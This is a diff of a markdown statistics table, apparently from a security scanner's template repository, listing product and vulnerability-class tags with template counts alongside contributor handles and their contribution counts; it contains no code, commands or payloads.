+| setup                                           |    11 | w4cky_                                |     2 |                      |       |          |       |      |       |
+| online-fire-reporting                           |    11 | bing0o                                |     2 |                      |       |          |       |      |       |
+| xstream                                         |    11 | convisoappsec                         |     2 |                      |       |          |       |      |       |
+| digitalocean                                    |    10 | parzival                              |     2 |                      |       |          |       |      |       |
+| redis                                           |    10 | dahse89                               |     2 |                      |       |          |       |      |       |
+| ssti                                            |    10 | socketz                               |     2 |                      |       |          |       |      |       |
+| thinkphp                                        |    10 | lotusdll                              |     2 |                      |       |          |       |      |       |
+| django                                          |    10 | gtrrnr                                |     2 |                      |       |          |       |      |       |
+| icewarp                                         |    10 | redteambrasil                         |     2 |                      |       |          |       |      |       |
+| solarview                                       |    10 | moritz nentwig                        |     2 |                      |       |          |       |      |       |
+| ssh                                             |    10 | brucelsone                            |     2 |                      |       |          |       |      |       |
+| glpi                                            |    10 | codexlynx                             |     2 |                      |       |          |       |      |       |
+| symfony                                         |    10 | c3l3si4n                              |     2 |                      |       |          |       |      |       |
+| headless                                        |    10 | myztique                              |     2 |                      |       |          |       |      |       |
+| node                                            |    10 | joeldeleep                            |     2 |                      |       |          |       |      |       |
+| dedecms                                         |    10 | farish                                |     2 |                      |       |          |       |      |       |
+| prometheus                                      |    10 | x1m_martijn                           |     2 |                      |       |          |       |      |       |
+| windows                                         |    10 | y4er                                  |     2 |                      |       |          |       |      |       |
+| db                                              |    10 | 0xcrypto                              |     2 |                      |       |          |       |      |       |
+| bitbucket                                       |     9 | manas_harsh                           |     2 |                      |       |          |       |      |       |
+| wso2                                            |     9 | danielmofer                           |     2 |                      |       |          |       |      |       |
+| cnvd2020                                        |     9 | ricardo maia (brainfork)              |     2 |                      |       |          |       |      |       |
+| vcenter                                         |     9 | ehsahil                               |     2 |                      |       |          |       |      |       |
+| installer                                       |     9 | mohammedsaneem                        |     2 |                      |       |          |       |      |       |
+| versa                                           |     9 | ree4pwn                               |     2 |                      |       |          |       |      |       |
+| elasticsearch                                   |     9 | korteke                               |     2 |                      |       |          |       |      |       |
+| zabbix                                          |     9 | 0xrudra                               |     2 |                      |       |          |       |      |       |
+| solr                                            |     9 | maximus decimus                       |     2 |                      |       |          |       |      |       |
+| pfsense                                         |     9 | joshlarsen                            |     2 |                      |       |          |       |      |       |
+| opencats                                        |     9 | z0ne                                  |     2 |                      |       |          |       |      |       |
+| firebase                                        |     9 | bp0lr                                 |     2 |                      |       |          |       |      |       |
+| cache                                           |     9 | sascha brendel                        |     2 |                      |       |          |       |      |       |
+| kube                                            |     9 | nuk3s3c                               |     2 |                      |       |          |       |      |       |
+| scada                                           |     9 | ajaysenr                              |     2 |                      |       |          |       |      |       |
+| sitecore                                        |     9 | zomsop82                              |     2 |                      |       |          |       |      |       |
+| gitea                                           |     9 | sy3omda                               |     2 |                      |       |          |       |      |       |
+| druid                                           |     9 | j3ssie                                |     2 |                      |       |          |       |      |       |
+| jetbrains                                       |     8 | koti2                                 |     2 |                      |       |          |       |      |       |
+| vbulletin                                       |     8 | paradessia                            |     2 |                      |       |          |       |      |       |
+| iis                                             |     8 | hackerarpan                           |     2 |                      |       |          |       |      |       |
+| default-page                                    |     8 | geekby                                |     2 |                      |       |          |       |      |       |
+| metadata                                        |     8 | github.com/its0x08                    |     2 |                      |       |          |       |      |       |
+| hikvision                                       |     8 | bsysop                                |     2 |                      |       |          |       |      |       |
+| unauthenticated                                 |     8 | heeress                               |     2 |                      |       |          |       |      |       |
+| console                                         |     8 | brenocss                              |     2 |                      |       |          |       |      |       |
+| smtp                                            |     8 | supras                                |     2 |                      |       |          |       |      |       |
+| bucket                                          |     8 | nkxxkn                                |     2 |                      |       |          |       |      |       |
+| crlf                                            |     8 | h0j3n                                 |     2 |                      |       |          |       |      |       |
+| mirai                                           |     8 | kre80r                                |     2 |                      |       |          |       |      |       |
+| e-office                                        |     8 | rafaelwdornelas                       |     2 |                      |       |          |       |      |       |
+| sangfor                                         |     8 | gevakun                               |     2 |                      |       |          |       |      |       |
+| emerge                                          |     8 | joshua rogers                         |     2 |                      |       |          |       |      |       |
+| exchange                                        |     8 | thezakman                             |     2 |                      |       |          |       |      |       |
+| config-audit                                    |     8 | 0xnirvana                             |     2 |                      |       |          |       |      |       |
+| recon                                           |     8 | dheerajmadhukar                       |     2 |                      |       |          |       |      |       |
+| oauth                                           |     8 | v0idc0de                              |     2 |                      |       |          |       |      |       |
+| hms                                             |     8 | 0xprial                               |     2 |                      |       |          |       |      |       |
+| osint-news                                      |     8 | pxmme1337                             |     2 |                      |       |          |       |      |       |
+| atom                                            |     8 | streetofhackerr007                    |     2 |                      |       |          |       |      |       |
+| manager                                         |     8 | hetroublemakr                         |     2 |                      |       |          |       |      |       |
+| ognl                                            |     8 | shelled                               |     2 |                      |       |          |       |      |       |
+| spotweb                                         |     8 | vavkamil                              |     2 |                      |       |          |       |      |       |
+| cisco-switch                                    |     8 | cristi vlad (@cristivlad25)           |     2 |                      |       |          |       |      |       |
+| sophos                                          |     7 | coldfish                              |     2 |                      |       |          |       |      |       |
+| odoo                                            |     7 | sinkettu                              |     2 |                      |       |          |       |      |       |
+| vms                                             |     7 | raesene                               |     2 |                      |       |          |       |      |       |
+| ivanti                                          |     7 | luci                                  |     2 |                      |       |          |       |      |       |
+| ofbiz                                           |     7 | uomogrande                            |     2 |                      |       |          |       |      |       |
+| huawei                                          |     7 | udit_thakkur                          |     2 |                      |       |          |       |      |       |
+| rconfig                                         |     7 | wa1tf0rme                             |     2 |                      |       |          |       |      |       |
+| error                                           |     7 | cckuakilong                           |     2 |                      |       |          |       |      |       |
+| symantec                                        |     7 | notnotnotveg                          |     2 |                      |       |          |       |      |       |
+| shopify                                         |     7 | paperpen                              |     2 |                      |       |          |       |      |       |
+| moodle                                          |     7 | 8arthur                               |     2 |                      |       |          |       |      |       |
+| fortios                                         |     7 | israel comazzetto dos reis            |     2 |                      |       |          |       |      |       |
+| dropbox                                         |     7 | g4l1t0                                |     2 |                      |       |          |       |      |       |
+| hashicorp                                       |     7 | afaq                                  |     2 |                      |       |          |       |      |       |
+| ec2                                             |     7 | d4vy                                  |     2 |                      |       |          |       |      |       |
+| secret                                          |     7 | dogancanbakir                         |     2 |                      |       |          |       |      |       |
+| websphere                                       |     7 | 0xelkomy                              |     2 |                      |       |          |       |      |       |
+| wanhu                                           |     7 | randomdhiraj                          |     2 |                      |       |          |       |      |       |
+| instrusive                                      |     7 | n-thumann                             |     2 |                      |       |          |       |      |       |
+| nagios                                          |     7 | dbrwsky                               |     2 |                      |       |          |       |      |       |
+| blockchain                                      |     7 | nvn1729                               |     2 |                      |       |          |       |      |       |
+| mobileiron                                      |     7 | mahendra purbia (mah3sec_)            |     2 |                      |       |          |       |      |       |
+| go                                              |     7 | andreluna                             |     2 |                      |       |          |       |      |       |
+| squirrelmail                                    |     7 | martincodes-de                        |     2 |                      |       |          |       |      |       |
+| nacos                                           |     7 | sbani                                 |     2 |                      |       |          |       |      |       |
+| avtech                                          |     7 | e1a                                   |     2 |                      |       |          |       |      |       |
+| samsung                                         |     7 | kresec                                |     1 |                      |       |          |       |      |       |
+| facebook                                        |     7 | lady_bug                              |     1 |                      |       |          |       |      |       |
+| discord                                         |     7 | thevillagehacker                      |     1 |                      |       |          |       |      |       |
+| gogs                                            |     7 | irshadahamed                          |     1 |                      |       |          |       |      |       |
+| maps                                            |     7 | zy9ard3                               |     1 |                      |       |          |       |      |       |
+| blind                                           |     7 | noamrathaus                           |     1 |                      |       |          |       |      |       |
+| nagiosxi                                        |     7 | vinit989                              |     1 |                      |       |          |       |      |       |
+| rfi                                             |     6 | rschio                                |     1 |                      |       |          |       |      |       |
+| artica                                          |     6 | compr00t                              |     1 |                      |       |          |       |      |       |
+| s3                                              |     6 | ahmetpergamum                         |     1 |                      |       |          |       |      |       |
+| jetty                                           |     6 | higor melgaço                         |     1 |                      |       |          |       |      |       |
+| newrelic                                        |     6 | mantissts                             |     1 |                      |       |          |       |      |       |
+| plesk                                           |     6 | rojanrijal                            |     1 |                      |       |          |       |      |       |
+| solarwinds                                      |     6 | hanlaomo                              |     1 |                      |       |          |       |      |       |
+| opensis                                         |     6 | matt miller                           |     1 |                      |       |          |       |      |       |
+| activemq                                        |     6 | marcos_iaf                            |     1 |                      |       |          |       |      |       |
+| cobbler                                         |     6 | udyz                                  |     1 |                      |       |          |       |      |       |
+| elfinder                                        |     6 | philippdelteil                        |     1 |                      |       |          |       |      |       |
+| slack                                           |     6 | thirukrishnan                         |     1 |                      |       |          |       |      |       |
+| minio                                           |     6 | ilovebinbash                          |     1 |                      |       |          |       |      |       |
+| 74cms                                           |     6 | tarunkoyalwar                         |     1 |                      |       |          |       |      |       |
+| doctor-appointment-system                       |     6 | andirrahmani1                         |     1 |                      |       |          |       |      |       |
+| python                                          |     6 | qianbenhyu                            |     1 |                      |       |          |       |      |       |
+| webmin                                          |     6 | infosecsanyam                         |     1 |                      |       |          |       |      |       |
+| keycloak                                        |     6 | daviey                                |     1 |                      |       |          |       |      |       |
+| phpinfo                                         |     6 | osamahamad                            |     1 |                      |       |          |       |      |       |
+| liferay                                         |     6 | esonhugh                              |     1 |                      |       |          |       |      |       |
+| jeecg                                           |     6 | brianlam38                            |     1 |                      |       |          |       |      |       |
+| nexus                                           |     6 | un-fmunozs                            |     1 |                      |       |          |       |      |       |
+| microstrategy                                   |     6 | kishore krishna (sillydaddy)          |     1 |                      |       |          |       |      |       |
+| bigip                                           |     6 | allenwest24                           |     1 |                      |       |          |       |      |       |
+| pmb                                             |     6 | pphuahua                              |     1 |                      |       |          |       |      |       |
+| database                                        |     6 | mihhailsokolov                        |     1 |                      |       |          |       |      |       |
+| cacti                                           |     6 | _darrenmartyn                         |     1 |                      |       |          |       |      |       |
+| lucee                                           |     6 | flag007                               |     1 |                      |       |          |       |      |       |
+| leak                                            |     6 | qlkwej                                |     1 |                      |       |          |       |      |       |
+| sonarqube                                       |     6 | open-sec                              |     1 |                      |       |          |       |      |       |
+| jamf                                            |     6 | patralos                              |     1 |                      |       |          |       |      |       |
+| tikiwiki                                        |     6 | luqmaan hadia                         |     1 |                      |       |          |       |      |       |
 |                                                 |       | [luqiih](https://github.com/luqiih)   |       |                      |       |          |       |      |       |
-| landray                                         |     3 | jc175                                 |     1 |                      |       |          |       |      |       |
-| linksys                                         |     3 | zinminphy0                            |     1 |                      |       |          |       |      |       |
-| synology                                        |     3 | toufik-airane                         |     1 |                      |       |          |       |      |       |
-| dotcms                                          |     3 | shreyapohekar                         |     1 |                      |       |          |       |      |       |
-| fanwei                                          |     3 | infosecsanyam                         |     1 |                      |       |          |       |      |       |
-| openwrt                                         |     3 | shockwave                             |     1 |                      |       |          |       |      |       |
-| proftpd                                         |     3 | gpiechnik2                            |     1 |                      |       |          |       |      |       |
-| bitrix                                          |     3 | pascalheidmann                        |     1 |                      |       |          |       |      |       |
-| httpbin                                         |     3 | kabirsuda                             |     1 |                      |       |          |       |      |       |
-| linux                                           |     3 | sak1                                  |     1 |                      |       |          |       |      |       |
-| shell                                           |     3 | aayush vishnoi                        |     1 |                      |       |          |       |      |       |
-| carel                                           |     3 | skylark-lab                           |     1 |                      |       |          |       |      |       |
-| spip                                            |     3 | shelld3v                              |     1 |                      |       |          |       |      |       |
-| figma                                           |     3 | vinit989                              |     1 |                      |       |          |       |      |       |
-| dubbo                                           |     3 | alex                                  |     1 |                      |       |          |       |      |       |
-| tongda                                          |     3 | th3r4id                               |     1 |                      |       |          |       |      |       |
-| bruteforce                                      |     3 | tarunkoyalwar                         |     1 |                      |       |          |       |      |       |
-| zendesk                                         |     3 | mariam tariq                          |     1 |                      |       |          |       |      |       |
-| teamcity                                        |     3 | higor melgaço                         |     1 |                      |       |          |       |      |       |
-| pypi                                            |     3 | marcos_iaf                            |     1 |                      |       |          |       |      |       |
-| matrix                                          |     3 | zsusac                                |     1 |                      |       |          |       |      |       |
-| rlm                                             |     3 | makyotox                              |     1 |                      |       |          |       |      |       |
-| waf                                             |     3 | dhiyaneshdki                          |     1 |                      |       |          |       |      |       |
-| mapbox                                          |     3 | chesterblue                           |     1 |                      |       |          |       |      |       |
-| temenos                                         |     3 | bywalks                               |     1 |                      |       |          |       |      |       |
-| nuxtjs                                          |     3 | regala_                               |     1 |                      |       |          |       |      |       |
-| sharefile                                       |     3 | iampritam                             |     1 |                      |       |          |       |      |       |
-| webadmin                                        |     3 | th3.d1p4k                             |     1 |                      |       |          |       |      |       |
-| kavita                                          |     3 | screamy                               |     1 |                      |       |          |       |      |       |
-| sugarcrm                                        |     3 | kagamigawa                            |     1 |                      |       |          |       |      |       |
-| xerox                                           |     3 | remonsec                              |     1 |                      |       |          |       |      |       |
-| cas                                             |     3 | team syslifters / christoph           |     1 |                      |       |          |       |      |       |
-|                                                 |       | mahrl                                 |       |                      |       |          |       |      |       |
-| superadmin                                      |     3 | ldionmarcil                           |     1 |                      |       |          |       |      |       |
-| thruk                                           |     3 | thevillagehacker                      |     1 |                      |       |          |       |      |       |
-| adafruit                                        |     3 | sickwell                              |     1 |                      |       |          |       |      |       |
-| metersphere                                     |     3 | dabla                                 |     1 |                      |       |          |       |      |       |
-| aria                                            |     3 | matthew nickerson (b0than) @          |     1 |                      |       |          |       |      |       |
+| mongodb                                         |     6 | thelicato                             |     1 |                      |       |          |       |      |       |
+| zhiyuan                                         |     6 | 0xceeb                                |     1 |                      |       |          |       |      |       |
+| fpd                                             |     6 | millermedia                           |     1 |                      |       |          |       |      |       |
+| kubelet                                         |     6 | 0xteles                               |     1 |                      |       |          |       |      |       |
+| filemanager                                     |     6 | iampritam                             |     1 |                      |       |          |       |      |       |
+| openvpn                                         |     6 | 0xceba                                |     1 |                      |       |          |       |      |       |
+| flutterwave                                     |     6 | fq_hsu                                |     1 |                      |       |          |       |      |       |
+| magmi                                           |     6 | httpvoid                              |     1 |                      |       |          |       |      |       |
+| carrental                                       |     5 | nuts7                                 |     1 |                      |       |          |       |      |       |
+| avaya                                           |     5 | natto97                               |     1 |                      |       |          |       |      |       |
+| adminer                                         |     5 | omarjezi                              |     1 |                      |       |          |       |      |       |
+| couchdb                                         |     5 | mhdsamx                               |     1 |                      |       |          |       |      |       |
+| storage                                         |     5 | manasmbellani                         |     1 |                      |       |          |       |      |       |
+| chanjet                                         |     5 | zhenwarx                              |     1 |                      |       |          |       |      |       |
+| tenda                                           |     5 | hateshape                             |     1 |                      |       |          |       |      |       |
+| avideo                                          |     5 | igibanez                              |     1 |                      |       |          |       |      |       |
+| ruckus                                          |     5 | rodnt                                 |     1 |                      |       |          |       |      |       |
+| awstats                                         |     5 | jiheon-dev                            |     1 |                      |       |          |       |      |       |
+| firmware                                        |     5 | davidfegyver                          |     1 |                      |       |          |       |      |       |
+| hybris                                          |     5 | push4d                                |     1 |                      |       |          |       |      |       |
+| kkfileview                                      |     5 | keni0k                                |     1 |                      |       |          |       |      |       |
+| jwt                                             |     5 | booboohq                              |     1 |                      |       |          |       |      |       |
+| strapi                                          |     5 | imhunterand                           |     1 |                      |       |          |       |      |       |
+| square                                          |     5 | hardik-rathod                         |     1 |                      |       |          |       |      |       |
+| geoserver                                       |     5 | husain                                |     1 |                      |       |          |       |      |       |
+| asp                                             |     5 | chesterblue                           |     1 |                      |       |          |       |      |       |
+| apisix                                          |     5 | kagamigawa                            |     1 |                      |       |          |       |      |       |
+| jupyter                                         |     5 | sinsinology                           |     1 |                      |       |          |       |      |       |
+| vrealize                                        |     5 | topscoder                             |     1 |                      |       |          |       |      |       |
+| cockpit                                         |     5 | godfatherorwa                         |     1 |                      |       |          |       |      |       |
+| metinfo                                         |     5 | 8authur                               |     1 |                      |       |          |       |      |       |
+| resin                                           |     5 | pry0cc                                |     1 |                      |       |          |       |      |       |
+| typo3                                           |     5 | zandros0                              |     1 |                      |       |          |       |      |       |
+| xmlrpc                                          |     5 | regala_                               |     1 |                      |       |          |       |      |       |
+| terramaster                                     |     5 | pascalheidmann                        |     1 |                      |       |          |       |      |       |
+| caucho                                          |     5 | furkansenan                           |     1 |                      |       |          |       |      |       |
+| asana                                           |     5 | william söderberg @ withsecure        |     1 |                      |       |          |       |      |       |
+| parallels                                       |     5 | alperenkesk                           |     1 |                      |       |          |       |      |       |
+| server                                          |     5 | borna nematzadeh                      |     1 |                      |       |          |       |      |       |
+| circarlife                                      |     5 | houdinis                              |     1 |                      |       |          |       |      |       |
+| rseenet                                         |     5 | b0rn2r00t                             |     1 |                      |       |          |       |      |       |
+| akamai                                          |     5 | sherlocksecurity                      |     1 |                      |       |          |       |      |       |
+| sql                                             |     5 | shreyapohekar                         |     1 |                      |       |          |       |      |       |
+| heroku                                          |     5 | am0nt31r0                             |     1 |                      |       |          |       |      |       |
+| paypal                                          |     5 | lrtk-coder                            |     1 |                      |       |          |       |      |       |
+| elastic                                         |     5 | zsusac                                |     1 |                      |       |          |       |      |       |
+| fatpipe                                         |     5 | dmartyn                               |     1 |                      |       |          |       |      |       |
+| landray                                         |     5 | sshell                                |     1 |                      |       |          |       |      |       |
+| gocd                                            |     5 | yashanand155                          |     1 |                      |       |          |       |      |       |
+| ethereum                                        |     5 | akshansh                              |     1 |                      |       |          |       |      |       |
+| zzzcms                                          |     5 | manikanta a.k.a @secureitmania        |     1 |                      |       |          |       |      |       |
+| openemr                                         |     5 | 0xd0ff9                               |     1 |                      |       |          |       |      |       |
+| microfocus                                      |     5 | evolutionsec                          |     1 |                      |       |          |       |      |       |
+| web3                                            |     5 | andysvints                            |     1 |                      |       |          |       |      |       |
+| bmc                                             |     5 | charanrayudu                          |     1 |                      |       |          |       |      |       |
+| horde                                           |     4 | ndmalc                                |     1 |                      |       |          |       |      |       |
+| mysql                                           |     4 | dale clarke                           |     1 |                      |       |          |       |      |       |
+| flink                                           |     4 | zinminphy0                            |     1 |                      |       |          |       |      |       |
+| webshell                                        |     4 | jaskaran                              |     1 |                      |       |          |       |      |       |
+| ebs                                             |     4 | blckraven                             |     1 |                      |       |          |       |      |       |
+| aspose                                          |     4 | adrianmf                              |     1 |                      |       |          |       |      |       |
+| mlflow                                          |     4 | bjxsec                                |     1 |                      |       |          |       |      |       |
+| stripe                                          |     4 | myst7ic                               |     1 |                      |       |          |       |      |       |
+| froxlor                                         |     4 | jbertman                              |     1 |                      |       |          |       |      |       |
+| ldap                                            |     4 | spac3wh1te                            |     1 |                      |       |          |       |      |       |
+| hongdian                                        |     4 | breno_css                             |     1 |                      |       |          |       |      |       |
+| grav                                            |     4 | dabla                                 |     1 |                      |       |          |       |      |       |
+| voip                                            |     4 | jrolf                                 |     1 |                      |       |          |       |      |       |
+| rabbitmq                                        |     4 | ruppde                                |     1 |                      |       |          |       |      |       |
+| wcs                                             |     4 | pjborah                               |     1 |                      |       |          |       |      |       |
+| log                                             |     4 | remi gascou (podalirius)              |     1 |                      |       |          |       |      |       |
+| gnuboard                                        |     4 | mukundbhuva                           |     1 |                      |       |          |       |      |       |
+| linkerd                                         |     4 | narluin                               |     1 |                      |       |          |       |      |       |
+| finicity                                        |     4 | apt-mirror                            |     1 |                      |       |          |       |      |       |
+| kentico                                         |     4 | bad5ect0r                             |     1 |                      |       |          |       |      |       |
+| panabit                                         |     4 | kailashbohara                         |     1 |                      |       |          |       |      |       |
+| mikrotik                                        |     4 | remonsec                              |     1 |                      |       |          |       |      |       |
+| yeswiki                                         |     4 | arr0way                               |     1 |                      |       |          |       |      |       |
+| beyondtrust                                     |     4 | numan türle                           |     1 |                      |       |          |       |      |       |
+| dropbear                                        |     4 | omarkurt                              |     1 |                      |       |          |       |      |       |
+| mostracms                                       |     4 | ynnirc                                |     1 |                      |       |          |       |      |       |
+| nosqli                                          |     4 | rotembar                              |     1 |                      |       |          |       |      |       |
+| sendgrid                                        |     4 | absshax                               |     1 |                      |       |          |       |      |       |
+| ampache                                         |     4 | gboddin                               |     1 |                      |       |          |       |      |       |
+| kevinlab                                        |     4 | arjunchandarana                       |     1 |                      |       |          |       |      |       |
+| centos                                          |     4 | retr0                                 |     1 |                      |       |          |       |      |       |
+| casaos                                          |     4 | sec_hawk                              |     1 |                      |       |          |       |      |       |
+| cloudflare                                      |     4 | f1she3                                |     1 |                      |       |          |       |      |       |
+| search                                          |     4 | momen eldawakhly                      |     1 |                      |       |          |       |      |       |
+| cve2007                                         |     4 | tea                                   |     1 |                      |       |          |       |      |       |
+| codeigniter                                     |     4 | affix                                 |     1 |                      |       |          |       |      |       |
+| age-encryption                                  |     4 | jbaines-r7                            |     1 |                      |       |          |       |      |       |
+| express                                         |     4 | pdp                                   |     1 |                      |       |          |       |      |       |
+| metasploit                                      |     4 | elmahdi                               |     1 |                      |       |          |       |      |       |
+| metersphere                                     |     4 | aaronchen0                            |     1 |                      |       |          |       |      |       |
+| password                                        |     4 | alexrydzak                            |     1 |                      |       |          |       |      |       |
+| zend                                            |     4 | amanrawat                             |     1 |                      |       |          |       |      |       |
+| mostra                                          |     4 | professorabhay                        |     1 |                      |       |          |       |      |       |
+| cve2005                                         |     4 | tirtha                                |     1 |                      |       |          |       |      |       |
+| concrete                                        |     4 | yavolo                                |     1 |                      |       |          |       |      |       |
+| metabase                                        |     4 | kabirsuda                             |     1 |                      |       |          |       |      |       |
+| axigen                                          |     4 | none                                  |     1 |                      |       |          |       |      |       |
+| consul                                          |     4 | justmumu                              |     1 |                      |       |          |       |      |       |
+| graylog                                         |     4 | michael wedl                          |     1 |                      |       |          |       |      |       |
+| jorani                                          |     4 | dhiyaneshdki                          |     1 |                      |       |          |       |      |       |
+| panos                                           |     4 | kiransau                              |     1 |                      |       |          |       |      |       |
+| gateway                                         |     4 | paper-pen                             |     1 |                      |       |          |       |      |       |
+| tls                                             |     4 | 1nf1n7y                               |     1 |                      |       |          |       |      |       |
+| bittrex                                         |     4 | af001                                 |     1 |                      |       |          |       |      |       |
+| newstatpress                                    |     4 | tim_koopmans                          |     1 |                      |       |          |       |      |       |
+| httpserver                                      |     4 | whynotke                              |     1 |                      |       |          |       |      |       |
+| datadog                                         |     4 | droberson                             |     1 |                      |       |          |       |      |       |
+| pentaho                                         |     4 | vikas kundu                           |     1 |                      |       |          |       |      |       |
+| openfire                                        |     4 | schniggie                             |     1 |                      |       |          |       |      |       |
+| qdpm                                            |     4 | kaizensecurity                        |     1 |                      |       |          |       |      |       |
+| nextjs                                          |     4 | willd96                               |     1 |                      |       |          |       |      |       |
+| osint-archived                                  |     4 | rubina119                             |     1 |                      |       |          |       |      |       |
+| cnvd2019                                        |     4 | clment cruchet                        |     1 |                      |       |          |       |      |       |
+| easypost                                        |     4 | pratik khalane                        |     1 |                      |       |          |       |      |       |
+| jellyfin                                        |     4 | ramondunker                           |     1 |                      |       |          |       |      |       |
+| mautic                                          |     4 | guax1                                 |     1 |                      |       |          |       |      |       |
+| powerjob                                        |     4 | dali                                  |     1 |                      |       |          |       |      |       |
+| telerik                                         |     4 | arqsz                                 |     1 |                      |       |          |       |      |       |
+| goanywhere                                      |     4 | manuelbua                             |     1 |                      |       |          |       |      |       |
+| hoteldruid                                      |     4 | nytr0gen                              |     1 |                      |       |          |       |      |       |
+| telesquare                                      |     4 | jcockhren                             |     1 |                      |       |          |       |      |       |
+| umbraco                                         |     4 | matthew nickerson (b0than) @          |     1 |                      |       |          |       |      |       |
 |                                                 |       | layer 8 security                      |       |                      |       |          |       |      |       |
-| postgresql                                      |     3 | bjhulst                               |     1 |                      |       |          |       |      |       |
-| credential                                      |     3 | shiva (strobes security)              |     1 |                      |       |          |       |      |       |
-| clientid                                        |     3 | pphuahua                              |     1 |                      |       |          |       |      |       |
-| securepoint                                     |     3 | ivo palazzolo (@palaziv)              |     1 |                      |       |          |       |      |       |
-| ampps                                           |     3 | evolutionsec                          |     1 |                      |       |          |       |      |       |
-| modem                                           |     3 | rubina119                             |     1 |                      |       |          |       |      |       |
-| hsphere                                         |     3 | dawid-czarnecki                       |     1 |                      |       |          |       |      |       |
-| papercut                                        |     3 | juliosmelo                            |     1 |                      |       |          |       |      |       |
-| airtable                                        |     3 | william söderberg @ withsecure        |     1 |                      |       |          |       |      |       |
-| jeesns                                          |     3 | official_blackhat13                   |     1 |                      |       |          |       |      |       |
-| eshop                                           |     3 | kiransau                              |     1 |                      |       |          |       |      |       |
-| pyload                                          |     3 | bernardo rodrigues                    |     1 |                      |       |          |       |      |       |
+| aura                                            |     4 | ringo                                 |     1 |                      |       |          |       |      |       |
+| churchcrm                                       |     4 | 2rs3c                                 |     1 |                      |       |          |       |      |       |
+| candidats                                       |     4 | metascan                              |     1 |                      |       |          |       |      |       |
+| royalevent                                      |     4 | patrick pirker                        |     1 |                      |       |          |       |      |       |
+| javascript                                      |     4 | dievus                                |     1 |                      |       |          |       |      |       |
+| mailchimp                                       |     4 | viondexd                              |     1 |                      |       |          |       |      |       |
+| prtg                                            |     4 | co0nan                                |     1 |                      |       |          |       |      |       |
+| phppgadmin                                      |     4 | skylark-lab                           |     1 |                      |       |          |       |      |       |
+| zte                                             |     4 | mesaglio                              |     1 |                      |       |          |       |      |       |
+| cnvd2022                                        |     4 | mr. bobo hp                           |     1 |                      |       |          |       |      |       |
+| puppet                                          |     4 | palanichamy_perumal                   |     1 |                      |       |          |       |      |       |
+| flickr                                          |     4 | opencirt                              |     1 |                      |       |          |       |      |       |
+| springcloud                                     |     4 | jc175                                 |     1 |                      |       |          |       |      |       |
+| roxy                                            |     4 | failopen                              |     1 |                      |       |          |       |      |       |
+| spark                                           |     4 | kurohost                              |     1 |                      |       |          |       |      |       |
+| qnap                                            |     4 | ok_bye_now                            |     1 |                      |       |          |       |      |       |
+| seagate                                         |     4 | j3ssie/geraldino2                     |     1 |                      |       |          |       |      |       |
+| pixie                                           |     4 | nagli                                 |     1 |                      |       |          |       |      |       |
+| confluent                                       |     4 | r3nz0                                 |     1 |                      |       |          |       |      |       |
+| thinkcmf                                        |     4 | rivalsec                              |     1 |                      |       |          |       |      |       |
+| swagger                                         |     4 | hakluke                               |     1 |                      |       |          |       |      |       |
+| artifactory                                     |     4 | juliosmelo                            |     1 |                      |       |          |       |      |       |
+| sentry                                          |     4 | noobexploiter                         |     1 |                      |       |          |       |      |       |
+| harbor                                          |     4 | juicypotato1                          |     1 |                      |       |          |       |      |       |
+| pie-register                                    |     4 | makyotox                              |     1 |                      |       |          |       |      |       |
+| ems                                             |     4 | ofjaaah                               |     1 |                      |       |          |       |      |       |
+| photo                                           |     4 | djoevanka                             |     1 |                      |       |          |       |      |       |
+| hongfan                                         |     4 | majidmc2                              |     1 |                      |       |          |       |      |       |
+| arcgis                                          |     4 | fopina                                |     1 |                      |       |          |       |      |       |
+| httpd                                           |     4 | lixts                                 |     1 |                      |       |          |       |      |       |
+| kibana                                          |     4 | ldionmarcil                           |     1 |                      |       |          |       |      |       |
+| hpe                                             |     4 | shivampand3y                          |     1 |                      |       |          |       |      |       |
+| openstack                                       |     4 | unkl4b                                |     1 |                      |       |          |       |      |       |
+| elementor                                       |     4 | knassar702                            |     1 |                      |       |          |       |      |       |
+| dolibarr                                        |     4 | ahmed abou-ela                        |     1 |                      |       |          |       |      |       |
+| redmine                                         |     4 | shelld3v                              |     1 |                      |       |          |       |      |       |
+| postmessage                                     |     4 | zeyad azima                           |     1 |                      |       |          |       |      |       |
+| poms                                            |     3 | bywalks                               |     1 |                      |       |          |       |      |       |
+| carel                                           |     3 | herry                                 |     1 |                      |       |          |       |      |       |
+| nortek                                          |     3 | aaron_costello                        |     1 |                      |       |          |       |      |       |
+|                                                 |       | (@conspiracyproof)                    |       |                      |       |          |       |      |       |
+| sugarcrm                                        |     3 | wabafet                               |     1 |                      |       |          |       |      |       |
+| movable                                         |     3 | ratnadip gajbhiye                     |     1 |                      |       |          |       |      |       |
+| netdata                                         |     3 | carlosvieira                          |     1 |                      |       |          |       |      |       |
+| papercut                                        |     3 | th3r4id                               |     1 |                      |       |          |       |      |       |
+| dos                                             |     3 | carrot2                               |     1 |                      |       |          |       |      |       |
+| pyload                                          |     3 | higor melgaço (eremit4)               |     1 |                      |       |          |       |      |       |
+| labkey                                          |     3 | aringo                                |     1 |                      |       |          |       |      |       |
+| voipmonitor                                     |     3 | revblock                              |     1 |                      |       |          |       |      |       |
+| trendnet                                        |     3 | aayush vishnoi                        |     1 |                      |       |          |       |      |       |
+| superset                                        |     3 | toufik-airane                         |     1 |                      |       |          |       |      |       |
+| thruk                                           |     3 | screamy                               |     1 |                      |       |          |       |      |       |
+| 3cx                                             |     3 | lamscun                               |     1 |                      |       |          |       |      |       |
+| info-leak                                       |     3 | berkdusunur                           |     1 |                      |       |          |       |      |       |
+| postgresql                                      |     3 | yashgoti                              |     1 |                      |       |          |       |      |       |
+| openai                                          |     3 | ramkrishna sawant                     |     1 |                      |       |          |       |      |       |
+| postman                                         |     3 | retr02332                             |     1 |                      |       |          |       |      |       |
+| proftpd                                         |     3 | ivo palazzolo (@palaziv)              |     1 |                      |       |          |       |      |       |
+| info                                            |     3 | furkansayim                           |     1 |                      |       |          |       |      |       |
+| rat                                             |     3 | j33n1k4                               |     1 |                      |       |          |       |      |       |
+| dubbo                                           |     3 | jteles                                |     1 |                      |       |          |       |      |       |
+| aria                                            |     3 | hazana                                |     1 |                      |       |          |       |      |       |
+| mongo                                           |     3 | b0yd                                  |     1 |                      |       |          |       |      |       |
+| getsimple                                       |     3 | x6263                                 |     1 |                      |       |          |       |      |       |
+| webkul-qloapps                                  |     3 | act1on3                               |     1 |                      |       |          |       |      |       |
+| mcafee                                          |     3 | adnanekhan                            |     1 |                      |       |          |       |      |       |
+| dreambox                                        |     3 | dawid-czarnecki                       |     1 |                      |       |          |       |      |       |
+| bigant                                          |     3 | luqman                                |     1 |                      |       |          |       |      |       |
+| aruba                                           |     3 | 0xh7ml                                |     1 |                      |       |          |       |      |       |
